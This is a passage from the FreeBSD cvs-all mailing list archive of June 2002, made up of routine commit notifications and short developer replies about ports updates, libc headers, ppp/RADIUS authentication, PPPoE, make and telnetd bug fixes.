Date: Sun, 16 Jun 2002 15:59:21 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/calendar/calendars calendar.holiday X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG grog 2002/06/16 15:59:21 PDT Modified files: usr.bin/calendar/calendars calendar.holiday Log: Remove 17 June as German national holiday. Revision Changes Path 1.18 +0 -1 src/usr.bin/calendar/calendars/calendar.holiday To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 16:41: 9 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7C13737B415; Sun, 16 Jun 2002 16:41:05 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GNf5g74285; Sun, 16 Jun 2002 16:41:05 -0700 (PDT) (envelope-from pat) Message-Id: <200206162341.g5GNf5g74285@freefall.freebsd.org> From: Patrick Li Date: Sun, 16 Jun 2002 16:41:05 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/mail/sylpheed-claws Makefile distinfo pkg-plist ports/mail/sylpheed-claws/files patch-configure X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/16 16:41:04 PDT Modified files: mail/sylpheed-claws Makefile distinfo pkg-plist mail/sylpheed-claws/files patch-configure Log: - Update to 0.7.8 - Dont use included gettext - Bump gpgme shlib version - Use REINPLACE_CMD Also use INSTALL_DATA to install docs. PR: 39372 Submitted by: maintainer Revision Changes Path 1.11 +10 -8 ports/mail/sylpheed-claws/Makefile 1.8 +1 -1 ports/mail/sylpheed-claws/distinfo 1.6 +49 -12 ports/mail/sylpheed-claws/files/patch-configure 1.7 +0 -2 ports/mail/sylpheed-claws/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 16:44: 0 2002 Delivered-To: cvs-all@freebsd.org Received: from mail.speakeasy.net (mail16.speakeasy.net [216.254.0.216]) by hub.freebsd.org (Postfix) with ESMTP id D469837B41B for ; Sun, 16 Jun 2002 16:43:50 -0700 (PDT) Received: (qmail 24409 invoked from network); 16 Jun 2002 23:43:49 -0000 Received: from unknown (HELO branwen.stty.net) ([216.27.178.239]) (envelope-sender ) by mail16.speakeasy.net (qmail-ldap-1.03) with DES-CBC3-SHA encrypted SMTP for ; 16 Jun 2002 23:43:49 -0000 Received: from branwen.stty.net (jim@localhost.stty.net [127.0.0.1]) by branwen.stty.net (8.12.3/8.12.3) with ESMTP id g5GNhnux003573; Sun, 16 Jun 2002 16:43:49 -0700 (PDT) (envelope-from jim@FreeBSD.org) Received: (from jim@localhost) by branwen.stty.net (8.12.3/8.12.3/Submit) id g5GNhmaU003532; Sun, 16 Jun 2002 16:43:49 -0700 (PDT) (envelope-from jim@FreeBSD.org) Date: Sun, 16 Jun 2002 16:43:48 -0700 From: Jim Mock To: Nik Clayton Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, blackend@FreeBSD.org Subject: Re: cvs commit: CVSROOT access Message-ID: <20020616234347.GA280@branwen.stty.net> Reply-To: jim@FreeBSD.org References: <200206162202.g5GM2WN57007@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200206162202.g5GM2WN57007@freefall.freebsd.org> User-Agent: Mutt/1.5.1i Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sun, 16 Jun 2002 at 15:02:32 -0700, Nik Clayton wrote: > nik 2002/06/16 15:02:32 PDT > > Modified files: > . access > Log: > It is my great pleasure to welcome Marc Fonvieille (blackend) to the > funny farm, for services above and beyond the call of duty to the -doc PR > list. Marc will be mentored by Giorgos as he joins our happy family. Yay! Welcome aboard Marc. I tried to warn you that this would happen eventually ;-) - jim -- jim mock http://soupnazi.org/ | jim@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 18: 4: 2 2002 Delivered-To: cvs-all@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 1854737B410; Sun, 16 Jun 2002 18:03:59 -0700 (PDT) Received: from khavrinen.lcs.mit.edu (localhost [IPv6:::1]) by khavrinen.lcs.mit.edu (8.12.3/8.12.3) with ESMTP id g5H13wDK087032; Sun, 16 Jun 2002 21:03:58 -0400 (EDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.12.3/8.12.3/Submit) id g5H13wGP087029; Sun, 16 Jun 2002 21:03:58 -0400 (EDT) (envelope-from wollman) Date: Sun, 16 Jun 2002 21:03:58 -0400 (EDT) From: Garrett Wollman Message-Id: <200206170103.g5H13wGP087029@khavrinen.lcs.mit.edu> To: Dag-Erling Smorgrav Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/dev/drm drm_os_freebsd.h In-Reply-To: <200206162150.g5GLohe55971@freefall.freebsd.org> References: <200206162150.g5GLohe55971@freefall.freebsd.org> Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG < said: > Remove to unbreak the build. I'm not sure if this affects > the functionality of the drm module, but hopefully it will tide us over > until Eric can take a look at it. It cannot possibly have affected the functionality, since was previously empty. -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 18:12:45 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2F8A937B40C; Sun, 16 Jun 2002 18:12:40 -0700 (PDT) Received: (from brian@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H1Ccr90923; Sun, 16 Jun 2002 18:12:38 -0700 (PDT) (envelope-from brian) Message-Id: <200206170112.g5H1Ccr90923@freefall.freebsd.org> From: Brian Somers Date: Sun, 16 Jun 2002 18:12:38 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.sbin/ppp chap.c chap.h pap.c radius.c radius.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG brian 2002/06/16 18:12:38 PDT Modified files: usr.sbin/ppp chap.c chap.h pap.c radius.c radius.h Log: Compensate for dodgy Win98/WinME MSCHAPv2 responses later in the code path... after we've talked to any RADIUS servers involved, so that we haven't touched the data before it gets to the server. Make it clearer in the code that this compensation is done by setting a flag to a value of zero, a flag which rfc2759 says *MUST* be zero. While we're here, don't bother passing the peer challenge into radius_Authenticate(). It's already part of the key we're passing in (this becomes obvious now that I've structured that data...). This ``fix'' doesn't help to authenticate Win98/WinME users in my test environment as ports/net/freeradius seems to ignore the flag completely anyway, but it may help with other RADIUS servers. Revision Changes Path 1.83 +17 -15 src/usr.sbin/ppp/chap.c 1.22 +7 -0 src/usr.sbin/ppp/chap.h 1.50 +1 -1 src/usr.sbin/ppp/pap.c 1.34 +8 -12 src/usr.sbin/ppp/radius.c 1.14 +1 -1 src/usr.sbin/ppp/radius.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 18:31:28 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9AEC937B40B; Sun, 16 Jun 2002 18:31:25 -0700 (PDT) Received: (from wollman@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H1VPZ92950; Sun, 16 Jun 2002 18:31:25 -0700 (PDT) (envelope-from wollman) Message-Id: <200206170131.g5H1VPZ92950@freefall.freebsd.org> From: Garrett Wollman Date: Sun, 16 Jun 2002 18:31:25 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/include time.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG wollman 2002/06/16 18:31:25 PDT Modified files: include time.h Log: Clean up a bit of namespace pollution which crept in with the last rev. Submitted by: bde Revision Changes Path 1.22 +1 -1 src/include/time.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 18:42:38 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3B3F737B400; Sun, 16 Jun 2002 18:42:34 -0700 (PDT) Received: (from wollman@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H1gYf94161; Sun, 16 Jun 2002 18:42:34 -0700 (PDT) (envelope-from wollman) Message-Id: <200206170142.g5H1gYf94161@freefall.freebsd.org> From: Garrett Wollman Date: Sun, 16 Jun 2002 18:42:34 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/lib/libc/stdtime time32.c src/include Makefile time.h timeconv.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG wollman 2002/06/16 18:42:34 PDT Modified files: lib/libc/stdtime time32.c include Makefile time.h Added files: include timeconv.h Log: Move dillon's time conversion functions to a new header . Since they were never documented and have never appeared in a FreeBSD release, no repo-copy of the header is done. This removes namespace pollution from . Revision Changes Path 1.171 +2 -2 src/include/Makefile 1.23 +0 -11 src/include/time.h 1.1 +65 -0 src/include/timeconv.h (new) 1.5 +1 -1 src/lib/libc/stdtime/time32.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 19:19: 9 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A4C9737B41C; Sun, 16 Jun 2002 19:19:06 -0700 (PDT) Received: (from brian@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H2J6U01435; Sun, 16 Jun 2002 19:19:06 -0700 (PDT) (envelope-from brian) Message-Id: <200206170219.g5H2J6U01435@freefall.freebsd.org> From: Brian Somers Date: Sun, 16 Jun 2002 19:19:06 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/netgraph ng_pppoe.c ng_pppoe.h X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG brian 2002/06/16 19:19:06 PDT Modified files: (Branch: RELENG_4) sys/netgraph ng_pppoe.c ng_pppoe.h Log: MFC: Send a NGM_PPPOE_SESSIONID message when we establish a connection Revision Changes Path 1.23.2.12 +36 -0 src/sys/netgraph/ng_pppoe.c 1.7.2.5 +2 -1 src/sys/netgraph/ng_pppoe.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 19:21:21 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0BF6837B414; Sun, 16 Jun 2002 19:21:18 -0700 (PDT) Received: (from wollman@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H2LI502081; Sun, 16 Jun 2002 19:21:18 -0700 (PDT) (envelope-from wollman) Message-Id: <200206170221.g5H2LI502081@freefall.freebsd.org> From: Garrett Wollman Date: Sun, 16 Jun 2002 19:21:17 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/lib/libc/gen Makefile.inc pselect.3 X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG wollman 2002/06/16 19:21:17 PDT Modified files: lib/libc/gen Makefile.inc Added files: lib/libc/gen pselect.3 Log: Actually document pselect(3) so that Bruce can mention it in the release notes. :-) Revision Changes Path 1.91 +1 -1 src/lib/libc/gen/Makefile.inc 1.1 +122 -0 src/lib/libc/gen/pselect.3 (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 19:21:43 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id DF7FF37B416; Sun, 16 Jun 2002 19:21:25 -0700 (PDT) Received: (from brian@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H2LPL02117; Sun, 16 Jun 2002 19:21:25 -0700 (PDT) (envelope-from brian) Message-Id: <200206170221.g5H2LPL02117@freefall.freebsd.org> From: Brian Somers Date: Sun, 16 Jun 2002 19:21:25 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/libexec/pppoed pppoed.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG brian 2002/06/16 19:21:25 PDT Modified files: (Branch: RELENG_4) libexec/pppoed pppoed.c Log: MFC: Handle NGM_PPPOE_SESSIONID messages Usage -> usage main(int argc, char **argv) -> main(int argc, char *argv[]) Revision Changes Path 1.2.6.8 +13 -4 src/libexec/pppoed/pppoed.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 19:23:45 2002 Delivered-To: cvs-all@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id E3FEE37B40B; Sun, 16 Jun 2002 19:23:41 -0700 (PDT) Received: from khavrinen.lcs.mit.edu (localhost [IPv6:::1]) by khavrinen.lcs.mit.edu (8.12.3/8.12.3) with ESMTP id g5H2NfDK087629; Sun, 16 Jun 2002 22:23:41 -0400 (EDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.12.3/8.12.3/Submit) id g5H2NfCi087626; Sun, 16 Jun 2002 22:23:41 -0400 (EDT) (envelope-from wollman) Date: Sun, 16 Jun 2002 22:23:41 -0400 (EDT) From: Garrett Wollman Message-Id: <200206170223.g5H2NfCi087626@khavrinen.lcs.mit.edu> To: cvs-committers@FreeBSD.org Cc: cvs-all@FreeBSD.org Subject: cvs commit: src/lib/libc/gen Makefile.inc pselect.3 In-Reply-To: <200206170221.g5H2LI502081@freefall.freebsd.org> References: <200206170221.g5H2LI502081@freefall.freebsd.org> Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG < said: > Actually document pselect(3) so that Bruce can mention it in the release > notes. :-) For whomever is working on the threads library these days... I have a strong suspicion that pselect() is supposed to be a cancellation point, so another wrapper should be added to libc_r. -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 19:25: 2 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0FFBC37B40C; Sun, 16 Jun 2002 19:24:58 -0700 (PDT) Received: (from brian@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H2Owu02360; Sun, 16 Jun 2002 19:24:58 -0700 (PDT) (envelope-from brian) Message-Id: <200206170224.g5H2Owu02360@freefall.freebsd.org> From: Brian Somers Date: Sun, 16 Jun 2002 19:24:57 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/lib/libradius Makefile libradius.3 radlib.c radlib.h radlib_private.h radlib_vs.h X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG brian 2002/06/16 19:24:57 PDT Modified files: (Branch: RELENG_4) lib/libradius Makefile libradius.3 radlib.c radlib.h radlib_private.h Added files: (Branch: RELENG_4) lib/libradius radlib_vs.h Log: MFC: Add vendor specific attribute support Add rad_request_authenticator() and rad_server_secret() Revision Changes Path 1.3.2.2 +2 -2 src/lib/libradius/Makefile 1.6.2.5 +37 -1 src/lib/libradius/libradius.3 1.4.2.3 +82 -1 src/lib/libradius/radlib.c 1.3.2.1 +18 -1 src/lib/libradius/radlib.h 1.4.2.1 +9 -1 src/lib/libradius/radlib_private.h 1.2.2.1 +80 -0 src/lib/libradius/radlib_vs.h (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 19:26:31 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0D86A37B40B; Sun, 16 Jun 2002 19:26:26 -0700 (PDT) Received: (from glewis@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H2QQk02521; Sun, 16 Jun 2002 19:26:26 -0700 (PDT) (envelope-from glewis) Message-Id: <200206170226.g5H2QQk02521@freefall.freebsd.org> From: Greg Lewis Date: Sun, 16 Jun 2002 19:26:25 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/dgd-lpmud pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG glewis 2002/06/16 19:26:25 PDT Modified files: net/dgd-lpmud pkg-plist Log: Unbreak the packing list for this port. As the list of files to install for the port is generated from the packing list, this also unbreaks the port (a critical file was not installed, meaning the mud couldn't be started). In particular: . Don't include empty directories (these will be addressed in a later commit). . Don't include non-existent files. . Do include a critical header file, namely auto.h without which the mud cannot start. Revision Changes Path 1.7 +1 -8 ports/net/dgd-lpmud/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 19:31:14 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 07C2F37B413; Sun, 16 Jun 2002 19:31:12 -0700 (PDT) Received: (from glewis@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H2VCH03272; Sun, 16 Jun 2002 19:31:12 -0700 (PDT) (envelope-from glewis) Message-Id: <200206170231.g5H2VCH03272@freefall.freebsd.org> From: Greg Lewis Date: Sun, 16 Jun 2002 19:31:11 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/dgd-lpmud/files patch-ab ports/net/dgd-lpmud/scripts configure X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG glewis 2002/06/16 19:31:11 PDT Modified files: net/dgd-lpmud/files patch-ab net/dgd-lpmud/scripts configure Log: Make the mud configuration and start up scripts respect PREFIX. Revision Changes Path 1.8 +4 -2 ports/net/dgd-lpmud/files/patch-ab 1.8 +11 -0 ports/net/dgd-lpmud/scripts/configure To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 19:35:22 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 45D1537B40F; Sun, 16 Jun 2002 19:35:08 -0700 (PDT) Received: (from glewis@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H2Z8u03516; Sun, 16 Jun 2002 19:35:08 -0700 (PDT) (envelope-from glewis) Message-Id: <200206170235.g5H2Z8u03516@freefall.freebsd.org> From: Greg Lewis Date: Sun, 16 Jun 2002 19:35:08 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/dgd-lpmud Makefile pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG glewis 2002/06/16 19:35:08 PDT Modified files: net/dgd-lpmud Makefile pkg-plist Log: . Rejig the packing list so the PKG_ARGS redefinition in the Makefile is no longer necessary. Also, create and remove directories which are initially empty but necessary for normal mud operation. . Take maintainership. . Install an example of the ACCESS.ALLOW and ACCESS.DENY files and adjust the installation process to take account of the new packing list (which it uses). Still to address is the issue of the mud setting up its own directory. This needs to be addressed in the context of the server port (net/dgd). Revision Changes Path 1.27 +14 -7 ports/net/dgd-lpmud/Makefile 1.8 +633 -596 ports/net/dgd-lpmud/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 19:44: 3 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C262037B43B; Sun, 16 Jun 2002 19:44:00 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H2i0K04701; Sun, 16 Jun 2002 19:44:00 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206170244.g5H2i0K04701@freefall.freebsd.org> From: Juli Mallett Date: Sun, 16 Jun 2002 19:44:00 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/make main.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/16 19:44:00 PDT Modified files: (Branch: RELENG_4) usr.bin/make main.c Log: MFC revisions 1.58 and 1.61: Use the actual path as per realpath(3) when referring to the Makefile internal to make(1), but export the path name as handed to us in ${MAKEFILE} Revision Changes Path 1.35.2.5 +13 -6 src/usr.bin/make/main.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 19:45:38 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3809D37B42C; Sun, 16 Jun 2002 19:44:55 -0700 (PDT) Received: (from glewis@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H2is404778; Sun, 16 Jun 2002 19:44:54 -0700 (PDT) (envelope-from glewis) Message-Id: <200206170244.g5H2is404778@freefall.freebsd.org> From: Greg Lewis Date: Sun, 16 Jun 2002 19:44:54 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/dgd-lpmud pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG glewis 2002/06/16 19:44:54 PDT Modified files: net/dgd-lpmud pkg-plist Log: Really fix the packing list. There is some issue with respect to including files which DGD generates, but they will always be there if the mud has been started and even if it hasn't they only generate a warning. Revision Changes Path 1.9 +2 -1 ports/net/dgd-lpmud/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 19:48:11 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 47DAF37B419; Sun, 16 Jun 2002 19:48:06 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H2m6k05014; Sun, 16 Jun 2002 19:48:06 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206170248.g5H2m6k05014@freefall.freebsd.org> From: Juli Mallett Date: Sun, 16 Jun 2002 19:48:06 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/crypto/telnet/telnetd sys_term.c src/libexec/telnetd sys_term.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/16 19:48:06 PDT Modified files: (Branch: RELENG_4) crypto/telnet/telnetd sys_term.c libexec/telnetd sys_term.c Log: MFC: Don't risk catching a signal while handling a signal for a dying child, as we can then end up not properly clearing wtmp/utmp entries. PR: bin/37934 Submitted by: Sandeep Kumar Reviewed by: markm Revision Changes Path 1.17 +8 -0 src/crypto/telnet/telnetd/sys_term.c 1.38 +8 -0 src/libexec/telnetd/sys_term.c Revision Changes Path 1.7.2.5 +9 -1 src/crypto/telnet/telnetd/sys_term.c 1.24.2.8 +8 -0 src/libexec/telnetd/sys_term.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 20:45:19 2002 Delivered-To: cvs-all@freebsd.org Received: from mailman.zeta.org.au (mailman.zeta.org.au [203.26.10.16]) by hub.freebsd.org (Postfix) with ESMTP id 617A837B414; Sun, 16 Jun 2002 20:45:15 -0700 (PDT) Received: from bde.zeta.org.au (bde.zeta.org.au [203.2.228.102]) by mailman.zeta.org.au (8.9.3/8.8.7) with ESMTP id NAA01337; Mon, 17 Jun 2002 13:45:04 +1000 Date: Mon, 17 Jun 2002 13:49:44 +1000 (EST) From: Bruce Evans X-X-Sender: bde@gamplex.bde.org To: Garrett Wollman Cc: Dag-Erling Smorgrav , , Subject: Re: cvs commit: src/sys/dev/drm drm_os_freebsd.h In-Reply-To: <200206170103.g5H13wGP087029@khavrinen.lcs.mit.edu> Message-ID: <20020617134613.A3073-100000@gamplex.bde.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sun, 16 Jun 2002, Garrett Wollman wrote: > < said: > > > Remove to unbreak the build. I'm not sure if this affects > > the functionality of the drm module, but hopefully it will tide us over > > until Eric can take a look at it. > > It cannot possibly have affected the functionality, since > was previously empty. Please fix misuses of all over the kernel. There seems to be only one complete misuse (in smb_dev.c). This happens to compile because is not included. There are many includes of in ugly ifdefs. Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 20:46:13 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 159DE37B405; Sun, 16 Jun 2002 20:46:09 -0700 (PDT) Received: (from lioux@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H3k8T14184; Sun, 16 Jun 2002 20:46:08 -0700 (PDT) (envelope-from lioux) Message-Id: <200206170346.g5H3k8T14184@freefall.freebsd.org> From: Mario Sergio Fujikawa Ferreira Date: Sun, 16 Jun 2002 20:46:08 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/dctc Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: 